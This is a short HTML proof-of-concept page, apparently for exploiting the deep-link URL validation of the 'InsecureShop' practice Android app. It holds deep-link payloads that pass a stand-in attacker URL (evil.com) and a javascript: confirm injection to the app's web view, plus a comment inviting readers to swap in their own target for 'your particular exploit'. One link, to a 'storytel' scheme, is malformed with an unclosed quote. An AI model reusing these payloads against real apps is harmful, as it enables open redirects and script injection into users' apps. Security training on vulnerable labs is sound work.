<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Insecure Shop URL Validation</title>
</head>
<body>
    <!-- To Use This For Your Particular Exploit Just change the href below  -->
<!--     <a href="insecureshop://com.insecureshop/web?url=https://evil.com">Insecure Hack Here</a> -->
    <a href="storytel://pcpcctdbd>Insecure Hack Here</a>
    <a href="insecureshop://com.insecureshop/web?url=javascript:confirm('https://aseemshrey.in')">Insecure Hack 2</a>
</body>
</html>
